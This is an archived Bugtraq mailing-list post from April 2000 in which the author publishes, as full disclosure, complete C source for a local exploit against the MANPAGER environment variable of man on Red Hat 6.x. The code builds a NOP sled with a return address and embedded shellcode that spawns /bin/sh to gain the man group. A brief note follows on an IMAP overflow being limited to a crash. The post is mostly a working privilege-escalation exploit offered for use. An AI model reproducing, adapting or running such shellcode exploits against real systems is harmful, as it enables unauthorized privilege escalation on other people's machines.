Bugtraq mailing list archives

man-exploit for MANPAGER environment and a comment about the IMAP vuln

From: psychoid () GMX NET (psychoid () GMX NET)
Date: Mon, 24 Apr 2000 10:51:36 +0200


For the sake of full disclosure an exploit for the MANPAGER environment
variable:

- snip -

/*
 * MAN-Exploit for MANPAGER environmental variable.
 * rh 6.x, tested on rh 6.1
 * written by psychoid/tCl
 * gives egid man.
 *
 * Originally discovered by lcamtuf.
 * educational. yes.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   unsigned long offset;
   unsigned long addi=0xbfffacc4;

   u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"

"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"

"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                        "\xd7\xff\xff\xff/bin/sh";
 /* extreme nice shellycode */
   int i;

   if(argc<2)
   {
       offset=150;
   } else {
       offset=strtoul(argv[1],NULL,16);
   }
   printf("Building buffer for adress %-8x\n",offset+addi);

   buff = malloc(4062);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   printf("Nopping..\n");
   /* filling with nops */
   memset(ptr, 0x0, 4062);
   memset(ptr, 0x90, 4061);
   printf("Setting adress.. %-8x\n",ptr);
   ptr+=0xf71;
   addr_ptr=(long *)ptr;
   *(addr_ptr++) = offset + addi;
   /* shelly */
   printf("Copying shell code..\n");
   ptr=buff+0xf6f-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   *ptr++='\n';
   printf("Done. Setting environmental variable.\n");
   setenv("MANPAGER",buff,1);
   printf("Calling man..\n");
   execl("/usr/bin/man", "psychoid", "man", NULL);
   exit(0x0);
}

-snap-

A comment about IMAP and the possibility to gain shell access by
generating an overflow (tested for IMAP 12.250 on redhat 6.1):

IMAP filters characters which would have to be used in a changed return
adress (0xFF for example), so an exploit could crash the active instance
(which could result in a core dump to a preselected Folder) only.

Its impossible to give a return adress to the range of the buffer.

Greetings,
psychoid

--
Sent through GMX FreeMail - http://www.gmx.net

Current thread:

netkill - generic remote DoS attack stanislav shalunov (Apr 21)
- Buffer Overflow in version .14 Jesse Schachter (Apr 24)
  - Re: Buffer Overflow in version .14 Alan DeKok (Apr 25)
- man-exploit for MANPAGER environment and a comment about the IMAP vuln psychoid () GMX NET (Apr 24)
  - Re: man-exploit for MANPAGER environment... Mariusz Woloszyn (Apr 26)
- mtr-0.41 root exploit Przemyslaw Frasunek (Apr 24)
  - Re: mtr-0.41 root exploit Kris Kennaway (Apr 24)
  - Two Problems in IMP 2 Jose Nazario (Apr 24)
    - Re: Two Problems in IMP 2 Ivan E. Moore II (Apr 25)
- Solaris x86 Xsun overflow. Theodor Ragnar Gislason (Apr 24)
- Solaris 7 x86 lp exploit Theodor Ragnar Gislason (Apr 24)
  - Re: Solaris 7 x86 lp exploit Laurent LEVIER (Apr 24)
- Re: netkill - generic remote DoS attack stanislav shalunov (Apr 24)
- Solaris 7 x86 lpset exploit. Theodor Ragnar Gislason (Apr 24)

(Thread continues...)